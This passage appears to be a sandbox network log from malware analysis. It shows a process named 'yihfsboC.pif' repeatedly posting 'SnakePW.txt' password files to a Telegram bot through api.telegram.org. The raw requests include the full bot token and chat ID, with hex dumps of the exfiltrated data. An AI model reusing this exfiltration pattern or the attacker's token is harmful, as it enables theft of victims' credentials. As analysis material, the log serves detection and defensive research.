                                                                                                                2024-11-26 07:26:19 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388988,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605979,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                76192.168.2.749970149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:20 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fe7f7931677
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:20 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 65 37 66 37 39 33 31 36 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fe7f7931677Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:21 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:20 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:21 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388990,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605980,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                77192.168.2.749971149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:20 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ff1a9c0edb8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:20 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 66 31 61 39 63 30 65 64 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ff1a9c0edb8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:21 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:21 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:21 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388992,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605981,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                78192.168.2.749972149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:21 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10c1527eafe5
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:21 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 63 31 35 32 37 65 61 66 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10c1527eafe5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:21 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:21 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:21 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388994,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605981,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                79192.168.2.749978149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:22 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1006e1e9399e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:22 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 36 65 31 65 39 33 39 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1006e1e9399eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:23 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:22 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:23 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388996,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605982,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                80192.168.2.749979149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:22 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1011a0457cfd
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:22 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 31 31 61 30 34 35 37 63 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1011a0457cfdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:23 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:23 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:23 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388998,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605982,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                81192.168.2.749980149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:22 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10f381542235
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:22 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 66 33 38 31 35 34 32 32 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10f381542235Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:23 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:23 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:23 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389000,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605983,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                82192.168.2.749985149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:24 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd102ad1bb58e8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:24 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 61 64 31 62 62 35 38 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd102ad1bb58e8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:25 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
